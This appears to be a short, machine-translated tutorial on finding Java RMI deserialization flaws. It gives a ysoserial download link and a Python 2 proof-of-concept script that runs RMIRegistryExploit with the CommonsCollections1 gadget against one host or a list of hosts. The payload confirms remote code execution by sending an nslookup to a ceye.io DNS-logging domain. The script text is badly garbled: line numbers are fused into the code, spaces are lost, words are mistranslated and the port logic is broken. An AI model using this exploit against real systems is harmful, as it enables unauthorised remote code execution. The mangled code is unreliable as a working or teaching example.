1, first download the commonly used tools ysoserial
Available here: Https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
2. How to use:
1 Java-cp1099"nslookup *******.********.ceye.io"
3, written as POC as follows
1 #!/usr/bin/python2 #-*-coding:utf-8-*-3 4 ImportOS5 ImportSYS6 7 defCheck (host,port=1099,infile=None):8 ifinfile = =None:9cmd ='JAVA-CP Ysoserial-0.0.6-snapshot-all.jar ysoserial.exploit.RMIRegistryExploit%s%s CommonsCollections1 " Nslookup *.*.ceye.io "'%(Host,port)TenResponse =os.popen (cmd) One PrintResponse.read () A Else: -With open (infile,"R") as fr: - forTargetinchfr.readlines (): thetarget = Target.split ("\ n") [0].split ("\ r") [0] -Host = Target.split (":") [0] -IP = target.split (":") [-1] - ifIp.find ("."): +IP = 1099 -cmd ='JAVA-CP Ysoserial-0.0.6-snapshot-all.jar ysoserial.exploit.RMIRegistryExploit%s%s CommonsCollections1 " Nslookup *.*.ceye.io "'%(Host,port) +Response =os.popen (cmd) A PrintResponse.read () at - if __name__=='__main__': -parameter = sys.argv[1] - ifParameter.find (":") >0: -host = str (sys.argv[1]). Split (":") [0] -Port = str (sys.argv[1]). Split (":") [-1] in ifPort.find (".") >0: -Port = 1099 toinfile =None + Else: -infile = str (sys.argv[1]) theHost =None *Port =None $ ifHost! = None andHost! ="":Panax Notoginseng ifPort! = None andPort! ="": -Check (host=host,port=Port) the Else: +Check (host=host) A elifInFile! =None: the Print "[+] Fileinputstart" +Check (Host=none,port=1099,infile=infile)
Effects such as:
Java Anti-Serialization vulnerability detection